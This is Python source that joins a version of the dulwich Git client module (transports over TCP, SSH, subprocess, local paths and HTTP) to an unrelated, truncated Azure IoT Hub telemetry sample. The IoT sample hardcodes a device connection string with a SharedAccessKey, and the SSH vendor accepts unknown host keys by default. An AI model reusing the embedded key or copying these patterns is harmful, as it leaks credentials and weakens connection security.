NotGitRepository,
SendPackError,
UpdateRefsError,
)
from dulwich.protocol import (
_RBUFSIZE,
CAPABILITY_DELETE_REFS,
CAPABILITY_MULTI_ACK,
CAPABILITY_MULTI_ACK_DETAILED,
CAPABILITY_OFS_DELTA,
CAPABILITY_REPORT_STATUS,
CAPABILITY_SIDE_BAND_64K,
CAPABILITY_THIN_PACK,
COMMAND_DONE,
COMMAND_HAVE,
COMMAND_WANT,
SIDE_BAND_CHANNEL_DATA,
SIDE_BAND_CHANNEL_PROGRESS,
SIDE_BAND_CHANNEL_FATAL,
PktLineParser,
Protocol,
ProtocolFile,
TCP_GIT_PORT,
ZERO_SHA,
extract_capabilities,
)
from dulwich.pack import (
write_pack_objects,
)
from dulwich.refs import (
read_info_refs,
)
def _fileno_can_read(fileno):
"""Check if a file descriptor is readable."""
return len(select.select([fileno], [], [], 0)[0]) > 0
COMMON_CAPABILITIES = [CAPABILITY_OFS_DELTA, CAPABILITY_SIDE_BAND_64K]
FETCH_CAPABILITIES = ([CAPABILITY_THIN_PACK, CAPABILITY_MULTI_ACK,
CAPABILITY_MULTI_ACK_DETAILED] +
COMMON_CAPABILITIES)
SEND_CAPABILITIES = [CAPABILITY_REPORT_STATUS] + COMMON_CAPABILITIES
class ReportStatusParser(object):
"""Handle status as reported by servers with 'report-status' capability.
"""
def __init__(self):
self._done = False
self._pack_status = None
self._ref_status_ok = True
self._ref_statuses = []
def check(self):
"""Check if there were any errors and, if so, raise exceptions.
:raise SendPackError: Raised when the server could not unpack
:raise UpdateRefsError: Raised when refs could not be updated
"""
if self._pack_status not in (b'unpack ok', None):
raise SendPackError(self._pack_status)
if not self._ref_status_ok:
ref_status = {}
ok = set()
for status in self._ref_statuses:
if b' ' not in status:
# malformed response, move on to the next one
continue
status, ref = status.split(b' ', 1)
if status == b'ng':
if b' ' in ref:
ref, status = ref.split(b' ', 1)
else:
ok.add(ref)
ref_status[ref] = status
# TODO(user): don't assume encoding of refs is ascii.
raise UpdateRefsError(', '.join([
ref.decode('ascii') for ref in ref_status if ref not in ok]) +
' failed to update', ref_status=ref_status)
def handle_packet(self, pkt):
"""Handle a packet.
:raise GitProtocolError: Raised when packets are received after a
flush packet.
"""
if self._done:
raise GitProtocolError("received more data after status report")
if pkt is None:
self._done = True
return
if self._pack_status is None:
self._pack_status = pkt.strip()
else:
ref_status = pkt.strip()
self._ref_statuses.append(ref_status)
if not ref_status.startswith(b'ok '):
self._ref_status_ok = False
def read_pkt_refs(proto):
server_capabilities = None
refs = {}
# Receive refs from server
for pkt in proto.read_pkt_seq():
(sha, ref) = pkt.rstrip(b'\n').split(None, 1)
if sha == b'ERR':
raise GitProtocolError(ref)
if server_capabilities is None:
(ref, server_capabilities) = extract_capabilities(ref)
refs[ref] = sha
if len(refs) == 0:
return None, set([])
return refs, set(server_capabilities)
# TODO(user): this doesn't correctly degrade if the server doesn't
# support some capabilities. This should work properly with servers
# that don't support multi_ack.
class GitClient(object):
"""Git smart server client.
"""
def __init__(self, thin_packs=True, report_activity=None):
"""Create a new GitClient instance.
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
"""
self._report_activity = report_activity
self._report_status_parser = None
self._fetch_capabilities = set(FETCH_CAPABILITIES)
self._send_capabilities = set(SEND_CAPABILITIES)
if not thin_packs:
self._fetch_capabilities.remove(CAPABILITY_THIN_PACK)
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None, write_pack=write_pack_objects):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:param write_pack: Function called with (file, iterable of objects) to
write the objects returned by generate_pack_contents to the server.
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
raise NotImplementedError(self.send_pack)
def fetch(self, path, target, determine_wants=None, progress=None):
"""Fetch into a target repository.
:param path: Path to fetch from
:param target: Target repository to fetch into
:param determine_wants: Optional function to determine what refs
to fetch
:param progress: Optional progress function
:return: remote refs as dictionary
"""
if determine_wants is None:
determine_wants = target.object_store.determine_wants_all
f, commit, abort = target.object_store.add_pack()
try:
result = self.fetch_pack(
path, determine_wants, target.get_graph_walker(), f.write,
progress)
except:
abort()
raise
else:
commit()
return result
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
raise NotImplementedError(self.fetch_pack)
def _parse_status_report(self, proto):
unpack = proto.read_pkt_line().strip()
if unpack != b'unpack ok':
st = True
# flush remaining error data
while st is not None:
st = proto.read_pkt_line()
raise SendPackError(unpack)
statuses = []
errs = False
ref_status = proto.read_pkt_line()
while ref_status:
ref_status = ref_status.strip()
statuses.append(ref_status)
if not ref_status.startswith(b'ok '):
errs = True
ref_status = proto.read_pkt_line()
if errs:
ref_status = {}
ok = set()
for status in statuses:
if b' ' not in status:
# malformed response, move on to the next one
continue
status, ref = status.split(b' ', 1)
if status == b'ng':
if b' ' in ref:
ref, status = ref.split(b' ', 1)
else:
ok.add(ref)
ref_status[ref] = status
raise UpdateRefsError(', '.join([ref for ref in ref_status
if ref not in ok]) +
b' failed to update',
ref_status=ref_status)
def _read_side_band64k_data(self, proto, channel_callbacks):
"""Read per-channel data.
This requires the side-band-64k capability.
:param proto: Protocol object to read from
:param channel_callbacks: Dictionary mapping channels to packet
handlers to use. None for a callback discards channel data.
"""
for pkt in proto.read_pkt_seq():
channel = ord(pkt[:1])
pkt = pkt[1:]
try:
cb = channel_callbacks[channel]
except KeyError:
raise AssertionError('Invalid sideband channel %d' % channel)
else:
if cb is not None:
cb(pkt)
def _handle_receive_pack_head(self, proto, capabilities, old_refs,
new_refs):
"""Handle the head of a 'git-receive-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param old_refs: Old refs, as received from the server
:param new_refs: New refs
:return: (have, want) tuple
"""
want = []
have = [x for x in old_refs.values() if not x == ZERO_SHA]
sent_capabilities = False
all_refs = set(new_refs.keys()).union(set(old_refs.keys()))
for refname in all_refs:
old_sha1 = old_refs.get(refname, ZERO_SHA)
new_sha1 = new_refs.get(refname, ZERO_SHA)
if old_sha1 != new_sha1:
if sent_capabilities:
proto.write_pkt_line(old_sha1 + b' ' + new_sha1 + b' ' + refname)
else:
proto.write_pkt_line(
old_sha1 + b' ' + new_sha1 + b' ' + refname + b'\0' +
b' '.join(capabilities))
sent_capabilities = True
if new_sha1 not in have and new_sha1 != ZERO_SHA:
want.append(new_sha1)
proto.write_pkt_line(None)
return (have, want)
def _handle_receive_pack_tail(self, proto, capabilities, progress=None):
"""Handle the tail of a 'git-receive-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param progress: Optional progress reporting function
"""
if b"side-band-64k" in capabilities:
if progress is None:
progress = lambda x: None
channel_callbacks = {2: progress}
if CAPABILITY_REPORT_STATUS in capabilities:
channel_callbacks[1] = PktLineParser(
self._report_status_parser.handle_packet).parse
self._read_side_band64k_data(proto, channel_callbacks)
else:
if CAPABILITY_REPORT_STATUS in capabilities:
for pkt in proto.read_pkt_seq():
self._report_status_parser.handle_packet(pkt)
if self._report_status_parser is not None:
self._report_status_parser.check()
def _handle_upload_pack_head(self, proto, capabilities, graph_walker,
wants, can_read):
"""Handle the head of a 'git-upload-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param graph_walker: GraphWalker instance to call .ack() on
:param wants: List of commits to fetch
:param can_read: function that returns a boolean that indicates
whether there is extra graph data to read on proto
"""
assert isinstance(wants, list) and isinstance(wants[0], bytes)
proto.write_pkt_line(COMMAND_WANT + b' ' + wants[0] + b' ' + b' '.join(capabilities) + b'\n')
for want in wants[1:]:
proto.write_pkt_line(COMMAND_WANT + b' ' + want + b'\n')
proto.write_pkt_line(None)
have = next(graph_walker)
while have:
proto.write_pkt_line(COMMAND_HAVE + b' ' + have + b'\n')
if can_read():
pkt = proto.read_pkt_line()
parts = pkt.rstrip(b'\n').split(b' ')
if parts[0] == b'ACK':
graph_walker.ack(parts[1])
if parts[2] in (b'continue', b'common'):
pass
elif parts[2] == b'ready':
break
else:
raise AssertionError(
"%s not in ('continue', 'ready', 'common)" %
parts[2])
have = next(graph_walker)
proto.write_pkt_line(COMMAND_DONE + b'\n')
def _handle_upload_pack_tail(self, proto, capabilities, graph_walker,
pack_data, progress=None, rbufsize=_RBUFSIZE):
"""Handle the tail of a 'git-upload-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param graph_walker: GraphWalker instance to call .ack() on
:param pack_data: Function to call with pack data
:param progress: Optional progress reporting function
:param rbufsize: Read buffer size
"""
pkt = proto.read_pkt_line()
while pkt:
parts = pkt.rstrip(b'\n').split(b' ')
if parts[0] == b'ACK':
graph_walker.ack(parts[1])
if len(parts) < 3 or parts[2] not in (
b'ready', b'continue', b'common'):
break
pkt = proto.read_pkt_line()
if CAPABILITY_SIDE_BAND_64K in capabilities:
if progress is None:
# Just ignore progress data
progress = lambda x: None
self._read_side_band64k_data(proto, {
SIDE_BAND_CHANNEL_DATA: pack_data,
SIDE_BAND_CHANNEL_PROGRESS: progress}
)
else:
while True:
data = proto.read(rbufsize)
if data == b"":
break
pack_data(data)
class TraditionalGitClient(GitClient):
"""Traditional Git client."""
def _connect(self, cmd, path):
"""Create a connection to the server.
This method is abstract - concrete implementations should
implement their own variant which connects to the server and
returns an initialized Protocol object with the service ready
for use and a can_read function which may be used to see if
reads would block.
:param cmd: The git service name to which we should connect.
:param path: The path we should pass to the service.
"""
raise NotImplementedError()
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None, write_pack=write_pack_objects):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional callback called with progress updates
:param write_pack: Function called with (file, iterable of objects) to
write the objects returned by generate_pack_contents to the server.
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
proto, unused_can_read = self._connect(b'receive-pack', path)
with proto:
old_refs, server_capabilities = read_pkt_refs(proto)
negotiated_capabilities = self._send_capabilities & server_capabilities
if CAPABILITY_REPORT_STATUS in negotiated_capabilities:
self._report_status_parser = ReportStatusParser()
report_status_parser = self._report_status_parser
try:
new_refs = orig_new_refs = determine_wants(dict(old_refs))
except:
proto.write_pkt_line(None)
raise
if not CAPABILITY_DELETE_REFS in server_capabilities:
# Server does not support deletions. Fail later.
new_refs = dict(orig_new_refs)
for ref, sha in orig_new_refs.items():
if sha == ZERO_SHA:
if CAPABILITY_REPORT_STATUS in negotiated_capabilities:
report_status_parser._ref_statuses.append(
b'ng ' + sha + b' remote does not support deleting refs')
report_status_parser._ref_status_ok = False
del new_refs[ref]
if new_refs is None:
proto.write_pkt_line(None)
return old_refs
if len(new_refs) == 0 and len(orig_new_refs):
# NOOP - Original new refs filtered out by policy
proto.write_pkt_line(None)
if report_status_parser is not None:
report_status_parser.check()
return old_refs
(have, want) = self._handle_receive_pack_head(
proto, negotiated_capabilities, old_refs, new_refs)
if not want and old_refs == new_refs:
return new_refs
objects = generate_pack_contents(have, want)
dowrite = len(objects) > 0
dowrite = dowrite or any(old_refs.get(ref) != sha
for (ref, sha) in new_refs.items()
if sha != ZERO_SHA)
if dowrite:
write_pack(proto.write_file(), objects)
self._handle_receive_pack_tail(
proto, negotiated_capabilities, progress)
return new_refs
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
proto, can_read = self._connect(b'upload-pack', path)
with proto:
refs, server_capabilities = read_pkt_refs(proto)
negotiated_capabilities = (
self._fetch_capabilities & server_capabilities)
if refs is None:
proto.write_pkt_line(None)
return refs
try:
wants = determine_wants(refs)
except:
proto.write_pkt_line(None)
raise
if wants is not None:
wants = [cid for cid in wants if cid != ZERO_SHA]
if not wants:
proto.write_pkt_line(None)
return refs
self._handle_upload_pack_head(
proto, negotiated_capabilities, graph_walker, wants, can_read)
self._handle_upload_pack_tail(
proto, negotiated_capabilities, graph_walker, pack_data, progress)
return refs
def archive(self, path, committish, write_data, progress=None,
write_error=None):
proto, can_read = self._connect(b'upload-archive', path)
with proto:
proto.write_pkt_line(b"argument " + committish)
proto.write_pkt_line(None)
pkt = proto.read_pkt_line()
if pkt == b"NACK\n":
return
elif pkt == b"ACK\n":
pass
elif pkt.startswith(b"ERR "):
raise GitProtocolError(pkt[4:].rstrip(b"\n"))
else:
raise AssertionError("invalid response %r" % pkt)
ret = proto.read_pkt_line()
if ret is not None:
raise AssertionError("expected pkt tail")
self._read_side_band64k_data(proto, {
SIDE_BAND_CHANNEL_DATA: write_data,
SIDE_BAND_CHANNEL_PROGRESS: progress,
SIDE_BAND_CHANNEL_FATAL: write_error})
class TCPGitClient(TraditionalGitClient):
"""A Git Client that works over TCP directly (i.e. git://)."""
def __init__(self, host, port=None, *args, **kwargs):
if port is None:
port = TCP_GIT_PORT
self._host = host
self._port = port
TraditionalGitClient.__init__(self, *args, **kwargs)
def _connect(self, cmd, path):
sockaddrs = socket.getaddrinfo(
self._host, self._port, socket.AF_UNSPEC, socket.SOCK_STREAM)
s = None
err = socket.error("no address found for %s" % self._host)
for (family, socktype, proto, canonname, sockaddr) in sockaddrs:
s = socket.socket(family, socktype, proto)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
try:
s.connect(sockaddr)
break
except socket.error as err:
if s is not None:
s.close()
s = None
if s is None:
raise err
# -1 means system default buffering
rfile = s.makefile('rb', -1)
# 0 means unbuffered
wfile = s.makefile('wb', 0)
def close():
rfile.close()
wfile.close()
s.close()
proto = Protocol(rfile.read, wfile.write, close,
report_activity=self._report_activity)
if path.startswith(b"/~"):
path = path[1:]
proto.send_cmd(b'git-' + cmd, path, b'host=' + self._host)
return proto, lambda: _fileno_can_read(s)
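# Minimal usage sketch for the TCP transport above (illustrative only; the host,
# remote path and local repository are assumptions):
#   from dulwich.repo import Repo
#   client = TCPGitClient(b'git.example.org')
#   remote_refs = client.fetch(b'/project.git', Repo('/tmp/project'))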
class SubprocessWrapper(object):
"""A socket-like object that talks to a subprocess via pipes."""
def __init__(self, proc):
self.proc = proc
if sys.version_info[0] == 2:
self.read = proc.stdout.read
else:
self.read = BufferedReader(proc.stdout).read
self.write = proc.stdin.write
def can_read(self):
        if sys.platform == 'win32':
from msvcrt import get_osfhandle
from win32pipe import PeekNamedPipe
handle = get_osfhandle(self.proc.stdout.fileno())
data, total_bytes_avail, msg_bytes_left = PeekNamedPipe(handle, 0)
return total_bytes_avail != 0
else:
return _fileno_can_read(self.proc.stdout.fileno())
def close(self):
self.proc.stdin.close()
self.proc.stdout.close()
if self.proc.stderr:
self.proc.stderr.close()
self.proc.wait()
def find_git_command():
"""Find command to run for system Git (usually C Git).
"""
if sys.platform == 'win32': # support .exe, .bat and .cmd
try: # to avoid overhead
import win32api
except ImportError: # run through cmd.exe with some overhead
return ['cmd', '/c', 'git']
else:
status, git = win32api.FindExecutable('git')
return [git]
else:
return ['git']
class SubprocessGitClient(TraditionalGitClient):
"""Git client that talks to a server using a subprocess."""
def __init__(self, *args, **kwargs):
        self._connection = None
        self._stderr = kwargs.pop('stderr', None)
TraditionalGitClient.__init__(self, *args, **kwargs)
git_command = None
def _connect(self, service, path):
import subprocess
        if self.git_command is None:
            git_command = find_git_command()
        else:
            git_command = self.git_command
        argv = git_command + [service.decode('ascii'), path]
p = SubprocessWrapper(
subprocess.Popen(argv, bufsize=0, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=self._stderr))
return Protocol(p.read, p.write, p.close,
report_activity=self._report_activity), p.can_read
class LocalGitClient(GitClient):
"""Git Client that just uses a local Repo."""
def __init__(self, thin_packs=True, report_activity=None):
"""Create a new LocalGitClient instance.
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
"""
self._report_activity = report_activity
# Ignore the thin_packs argument
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None, write_pack=write_pack_objects):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:param write_pack: Function called with (file, iterable of objects) to
write the objects returned by generate_pack_contents to the server.
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
from dulwich.repo import Repo
with closing(Repo(path)) as target:
old_refs = target.get_refs()
new_refs = determine_wants(dict(old_refs))
have = [sha1 for sha1 in old_refs.values() if sha1 != ZERO_SHA]
want = []
all_refs = set(new_refs.keys()).union(set(old_refs.keys()))
for refname in all_refs:
old_sha1 = old_refs.get(refname, ZERO_SHA)
new_sha1 = new_refs.get(refname, ZERO_SHA)
if new_sha1 not in have and new_sha1 != ZERO_SHA:
want.append(new_sha1)
if not want and old_refs == new_refs:
return new_refs
target.object_store.add_objects(generate_pack_contents(have, want))
for name, sha in new_refs.items():
target.refs[name] = sha
return new_refs
def fetch(self, path, target, determine_wants=None, progress=None):
"""Fetch into a target repository.
:param path: Path to fetch from
:param target: Target repository to fetch into
:param determine_wants: Optional function to determine what refs
to fetch
:param progress: Optional progress function
:return: remote refs as dictionary
"""
from dulwich.repo import Repo
with closing(Repo(path)) as r:
return r.fetch(target, determine_wants=determine_wants,
progress=progress)
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
from dulwich.repo import Repo
with closing(Repo(path)) as r:
objects_iter = r.fetch_objects(determine_wants, graph_walker, progress)
# Did the process short-circuit (e.g. in a stateless RPC call)? Note
# that the client still expects a 0-object pack in most cases.
if objects_iter is None:
return
write_pack_objects(ProtocolFile(None, pack_data), objects_iter)
# What Git client to use for local access
default_local_git_client_cls = LocalGitClient
class SSHVendor(object):
"""A client side SSH implementation."""
def connect_ssh(self, host, command, username=None, port=None):
import warnings
warnings.warn(
"SSHVendor.connect_ssh has been renamed to SSHVendor.run_command",
DeprecationWarning)
return self.run_command(host, command, username=username, port=port)
def run_command(self, host, command, username=None, port=None):
"""Connect to an SSH server.
Run a command remotely and return a file-like object for interaction
with the remote command.
:param host: Host name
:param command: Command to run
        :param username: Optional name of user to log in as
:param port: Optional SSH port to use
"""
raise NotImplementedError(self.run_command)
class SubprocessSSHVendor(SSHVendor):
"""SSH vendor that shells out to the local 'ssh' command."""
def run_command(self, host, command, username=None, port=None):
import subprocess
#FIXME: This has no way to deal with passwords..
args = ['ssh', '-x']
if port is not None:
args.extend(['-p', str(port)])
if username is not None:
host = '%s@%s' % (username, host)
args.append(host)
proc = subprocess.Popen(args + command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
return SubprocessWrapper(proc)
try:
import paramiko
except ImportError:
pass
else:
import threading
class ParamikoWrapper(object):
STDERR_READ_N = 2048 # 2k
def __init__(self, client, channel, progress_stderr=None):
self.client = client
self.channel = channel
self.progress_stderr = progress_stderr
            # Always monitor stderr so that it is captured even when no
            # progress callback is provided.
            self.should_monitor = bool(progress_stderr) or True
self.monitor_thread = None
self.stderr = ''
# Channel must block
self.channel.setblocking(True)
# Start
if self.should_monitor:
self.monitor_thread = threading.Thread(
target=self.monitor_stderr)
self.monitor_thread.start()
def monitor_stderr(self):
while self.should_monitor:
# Block and read
data = self.read_stderr(self.STDERR_READ_N)
# Socket closed
if not data:
self.should_monitor = False
break
# Emit data
if self.progress_stderr:
self.progress_stderr(data)
# Append to buffer
self.stderr += data
def stop_monitoring(self):
# Stop StdErr thread
if self.should_monitor:
self.should_monitor = False
self.monitor_thread.join()
# Get left over data
data = self.channel.in_stderr_buffer.empty()
self.stderr += data
def can_read(self):
return self.channel.recv_ready()
def write(self, data):
return self.channel.sendall(data)
def read_stderr(self, n):
return self.channel.recv_stderr(n)
def read(self, n=None):
data = self.channel.recv(n)
data_len = len(data)
# Closed socket
if not data:
return
# Read more if needed
if n and data_len < n:
diff_len = n - data_len
return data + self.read(diff_len)
return data
def close(self):
self.channel.close()
self.stop_monitoring()
class ParamikoSSHVendor(object):
def __init__(self):
self.ssh_kwargs = {}
self.missing_host_policy = paramiko.client.WarningPolicy()
def run_command(self, host, command, username=None, port=None,
progress_stderr=None):
# Paramiko needs an explicit port. None is not valid
if port is None:
port = 22
client = paramiko.SSHClient()
client.set_missing_host_key_policy(self.missing_host_policy)
client.connect(host, username=username, port=port,
**self.ssh_kwargs)
# Open SSH session
channel = client.get_transport().open_session()
# Run commands
channel.exec_command(*command)
return ParamikoWrapper(
client, channel, progress_stderr=progress_stderr)
# Can be overridden by users
get_ssh_vendor = SubprocessSSHVendor
class SSHGitClient(TraditionalGitClient):
def __init__(self, host, port=None, username=None, *args, **kwargs):
self.host = host
self.port = port
self.username = username
TraditionalGitClient.__init__(self, *args, **kwargs)
self.alternative_paths = {}
def _get_cmd_path(self, cmd):
cmd = cmd.decode('ascii')
return self.alternative_paths.get(cmd, 'git-' + cmd)
def _connect(self, cmd, path):
if path.startswith("/~"):
path = path[1:]
con = get_ssh_vendor().run_command(
self.host, [self._get_cmd_path(cmd), path],
port=self.port, username=self.username)
return (Protocol(con.read, con.write, con.close,
report_activity=self._report_activity),
con.can_read)
def default_user_agent_string():
return "dulwich/%s" % ".".join([str(x) for x in dulwich.__version__])
def default_urllib2_opener(config):
if config is not None:
proxy_server = config.get("http", "proxy")
else:
proxy_server = None
handlers = []
if proxy_server is not None:
handlers.append(urllib2.ProxyHandler({"http": proxy_server}))
opener = urllib2.build_opener(*handlers)
if config is not None:
user_agent = config.get("http", "useragent")
else:
user_agent = None
if user_agent is None:
user_agent = default_user_agent_string()
opener.addheaders = [('User-agent', user_agent)]
return opener
class HttpGitClient(GitClient):
def __init__(self, base_url, dumb=None, opener=None, config=None, *args,
**kwargs):
self.base_url = base_url.rstrip("/") + "/"
self.dumb = dumb
if opener is None:
self.opener = default_urllib2_opener(config)
else:
self.opener = opener
GitClient.__init__(self, *args, **kwargs)
def __repr__(self):
return "%s(%r, dumb=%r)" % (type(self).__name__, self.base_url, self.dumb)
def _get_url(self, path):
return urlparse.urljoin(self.base_url, path).rstrip("/") + "/"
    def _http_request(self, url, headers=None, data=None):
        req = urllib2.Request(url, headers=headers or {}, data=data)
try:
resp = self.opener.open(req)
except urllib2.HTTPError as e:
if e.code == 404:
raise NotGitRepository()
if e.code != 200:
raise GitProtocolError("unexpected http response %d" % e.code)
return resp
def _discover_references(self, service, url):
assert url[-1] == "/"
url = urlparse.urljoin(url, "info/refs")
headers = {}
if self.dumb is not False:
url += "?service=%s" % service
headers["Content-Type"] = "application/x-%s-request" % service
resp = self._http_request(url, headers)
try:
self.dumb = (not resp.info().gettype().startswith("application/x-git-"))
if not self.dumb:
proto = Protocol(resp.read, None)
# The first line should mention the service
pkts = list(proto.read_pkt_seq())
if pkts != [('# service=%s\n' % service)]:
raise GitProtocolError(
"unexpected first line %r from smart server" % pkts)
return read_pkt_refs(proto)
else:
return read_info_refs(resp), set()
finally:
resp.close()
def _smart_request(self, service, url, data):
assert url[-1] == "/"
url = urlparse.urljoin(url, service)
headers = {"Content-Type": "application/x-%s-request" % service}
resp = self._http_request(url, headers, data)
if resp.info().gettype() != ("application/x-%s-result" % service):
raise GitProtocolError("Invalid content-type from server: %s"
% resp.info().gettype())
return resp
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None, write_pack=write_pack_objects):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:param write_pack: Function called with (file, iterable of objects) to
write the objects returned by generate_pack_contents to the server.
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
url = self._get_url(path)
old_refs, server_capabilities = self._discover_references(
b"git-receive-pack", url)
negotiated_capabilities = self._send_capabilities & server_capabilities
if CAPABILITY_REPORT_STATUS in negotiated_capabilities:
self._report_status_parser = ReportStatusParser()
new_refs = determine_wants(dict(old_refs))
if new_refs is None:
return old_refs
if self.dumb:
            raise NotImplementedError(self.send_pack)
req_data = BytesIO()
req_proto = Protocol(None, req_data.write)
(have, want) = self._handle_receive_pack_head(
req_proto, negotiated_capabilities, old_refs, new_refs)
if not want and old_refs == new_refs:
return new_refs
objects = generate_pack_contents(have, want)
if len(objects) > 0:
write_pack(req_proto.write_file(), objects)
resp = self._smart_request(b"git-receive-pack", url,
data=req_data.getvalue())
try:
resp_proto = Protocol(resp.read, None)
self._handle_receive_pack_tail(resp_proto, negotiated_capabilities,
progress)
return new_refs
finally:
resp.close()
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
:return: Dictionary with the refs of the remote repository
"""
url = self._get_url(path)
refs, server_capabilities = self._discover_references(
b"git-upload-pack", url)
negotiated_capabilities = self._fetch_capabilities & server_capabilities
wants = determine_wants(refs)
if wants is not None:
wants = [cid for cid in wants if cid != ZERO_SHA]
if not wants:
return refs
if self.dumb:
            raise NotImplementedError(self.fetch_pack)
req_data = BytesIO()
req_proto = Protocol(None, req_data.write)
self._handle_upload_pack_head(
req_proto, negotiated_capabilities, graph_walker, wants,
lambda: False)
resp = self._smart_request(
b"git-upload-pack", url, data=req_data.getvalue())
try:
resp_proto = Protocol(resp.read, None)
self._handle_upload_pack_tail(resp_proto, negotiated_capabilities,
graph_walker, pack_data, progress)
return refs
finally:
resp.close()
def get_transport_and_path_from_url(url, config=None, **kwargs):
"""Obtain a git client from a URL.
:param url: URL to open
:param config: Optional config object
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
:return: Tuple with client instance and relative path.
"""
parsed = urlparse.urlparse(url)
if parsed.scheme == 'git':
return (TCPGitClient(parsed.hostname, port=parsed.port, **kwargs),
parsed.path)
elif parsed.scheme == 'git+ssh':
path = parsed.path
if path.startswith('/'):
path = parsed.path[1:]
return SSHGitClient(parsed.hostname, port=parsed.port,
username=parsed.username, **kwargs), path
elif parsed.scheme in ('http', 'https'):
return HttpGitClient(urlparse.urlunparse(parsed), config=config,
**kwargs), parsed.path
elif parsed.scheme == 'file':
return default_local_git_client_cls(**kwargs), parsed.path
raise ValueError("unknown scheme '%s'" % parsed.scheme)
def get_transport_and_path(location, **kwargs):
"""Obtain a git client from a URL.
:param location: URL or path
:param config: Optional config object
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
:return: Tuple with client instance and relative path.
"""
# First, try to parse it as a URL
try:
return get_transport_and_path_from_url(location, **kwargs)
except ValueError:
pass
if (sys.platform == 'win32' and
location[0].isalpha() and location[1:3] == ':\\'):
# Windows local path
return default_local_git_client_cls(**kwargs), location
    if ':' in location and '@' not in location:
        # SSH with no user@, zero or one leading slash.
        (hostname, path) = location.split(':', 1)
        return SSHGitClient(hostname, **kwargs), path
    elif '@' in location and ':' in location:
        # SSH with user@host:foo.
        user_host, path = location.split(':', 1)
        user, host = user_host.rsplit('@', 1)
        return SSHGitClient(host, username=user, **kwargs), path
# Otherwise, assume it's a local path.
return default_local_git_client_cls(**kwargs), location
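# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example of how the scheme of a location string selects the client
# class; the URLs and paths below are made up purely for illustration and the
# helper is never called by the module itself.
def _example_get_transport_and_path():
    client, path = get_transport_and_path('git://example.com/repo.git')
    assert isinstance(client, TCPGitClient) and path == '/repo.git'
    client, path = get_transport_and_path('user@example.com:repo.git')
    assert isinstance(client, SSHGitClient) and path == 'repo.git'
    client, path = get_transport_and_path('/srv/git/repo.git')
    assert isinstance(client, LocalGitClient) and path == '/srv/git/repo.git'
    return client, path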
|
telemetry_listener.py
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for full license information.
import random
import time
import threading
# Using the Python Device SDK for IoT Hub:
# https://github.com/Azure/azure-iot-sdk-python
# The sample connects to a device-specific MQTT endpoint on your IoT Hub.
from azure.iot.device import IoTHubDeviceClient, Message, MethodResponse
# The device connection string to authenticate the device with your IoT hub.
# Using the Azure CLI:
# az iot hub device-identity show-connection-string --hub-name {YourIoTHubName} --device-id MyNodeDevice --output table
CONNECTION_STRING = "HostName=University-IoT-Cart.azure-devices.net;DeviceId=Pi_Envirnoment;SharedAccessKey=TWnLYcXf/sxYoacZry0akx7knPOa2gSojrkZ7oyBfX0="
# Define the JSON message to send to IoT Hub.
TEMPERATURE = 20.0
HUMIDITY = 60
MSG_TXT = '{{"temperature": {temperature},"humidity": {humidity}}}'
INTERVAL = 1
def iothub_client_init():
# Create an IoT Hub client
client = IoTHubDeviceClient.create_from_connection_string(CONNECTION_STRING)
return client
def device_method_listener(device_client):
global INTERVAL
while True:
method_request = device_client.receive_method_request()
print (
"\nMethod callback called with:\nmethodName = {method_name}\npayload = {payload}".format(
method_name=method_request.name,
payload=method_request.payload
)
)
if method_request.name == "SetTelemetryInterval":
try:
INTERVAL = int(method_request.payload)
except ValueError:
response_payload = {"Response": "Invalid parameter"}
response_status = 400
else:
